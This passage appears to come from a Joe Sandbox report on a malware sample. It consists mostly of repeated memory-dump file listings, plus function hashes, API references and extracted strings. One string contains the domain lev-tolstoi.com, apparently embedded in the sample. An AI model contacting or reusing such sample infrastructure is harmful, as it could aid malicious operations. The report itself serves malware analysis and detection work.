Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: Uninitialize
String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
API String ID: 3861434553-1386727196
Opcode ID: 45e9333056778237e26e67435b479d5d07ad0bde50d7da2431ca980d113d5250
Instruction ID: cb2f00b17429e5d94b69e9d9ff3532c2e183032ab2c399e2e1e4524e6c78e3a7
Opcode Fuzzy Hash: 45e9333056778237e26e67435b479d5d07ad0bde50d7da2431ca980d113d5250
Instruction Fuzzy Hash: A4A155B46047818FD716CF29C4C0662BFE2FF56310B18869CC8D64F79AD735A846EBA1

Function 00F08600 Relevance: 4.1, Strings: 3, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}, xrefs: 00F0890C
b]u), xrefs: 00F08877
}, xrefs: 00F08913

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: FreeLibrary
String ID: b]u)$}$}
API String ID: 3664257935-2900034282
Opcode ID: 514db8df36f421fb244e5e3dd175beac441ca07d7a90ec3c62b8c91d46901d29
Instruction ID: 18ba7f56d3aa25ed4c54199a6b42fc638fe4d0d67a42db658df4ac1a3b906029
Opcode Fuzzy Hash: 514db8df36f421fb244e5e3dd175beac441ca07d7a90ec3c62b8c91d46901d29
Instruction Fuzzy Hash: 9DC1F673E187144BC708DF69CC4125AF7D6ABC4710F0AC52DA898EB391EA74DC059BC2

Function 00F2D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00F2D3EE

Strings

><+, xrefs: 00F2D353

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ><+
API String ID: 3960555810-2918635699
Opcode ID: db342da345546a67a8ad42c664992e1b6cce817d4c8a21b575207545049be67b
Instruction ID: 90036fd9e28a04a8579648c29915936cdf37358ab2f54c22003acd8b7bd5a29d
Opcode Fuzzy Hash: db342da345546a67a8ad42c664992e1b6cce817d4c8a21b575207545049be67b
Instruction Fuzzy Hash: 68C1C375A047418FD725CF2AD490762FBE2BF9A314F28859DC4DA8B752C735E806CB50

Function 00F40D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

, xrefs: 00F40DC3, 00F40EAB
@Ukx, xrefs: 00F40F53

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: InitializeThunk
String ID: @Ukx$
API String ID: 2994545307-3636270652
Opcode ID: 2f050d8f505110001ec4e3339fb105f95eec7ac99f552d58d7035a24441628cc
Instruction ID: cc013d828452f1e757c1733f9b804a3e5d62831a54cda850cdec19081816880e
Opcode Fuzzy Hash: 2f050d8f505110001ec4e3339fb105f95eec7ac99f552d58d7035a24441628cc
Instruction Fuzzy Hash: 34B16633F083104BD728CE28DCD12ABBBA2EBC5324F19893CDE8657385DA359C45A781

Function 00F0E687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON

Download Yara Rule

Strings

275FADAC3E1ECC72BEBA0C6A975F1733, xrefs: 00F0E770, 00F0E8FE

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: 275FADAC3E1ECC72BEBA0C6A975F1733
API String ID: 0-1277471791
Opcode ID: 9ac09cc3d799d2d8960c582d5a58fa280ddbf1aaf9c7917b29b878166d938247
Instruction ID: ff311f5ef6903d630cb4529dffb2e7a02e49d21f9689bd2f84cbcdeed17719f1
Opcode Fuzzy Hash: 9ac09cc3d799d2d8960c582d5a58fa280ddbf1aaf9c7917b29b878166d938247
Instruction Fuzzy Hash: D9815C756407418BD3248B38CC927A7B7E2FF9A325F0CCA6CD4864B783E678A846D750

Function 00F3E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00F412FB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00F3E13E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
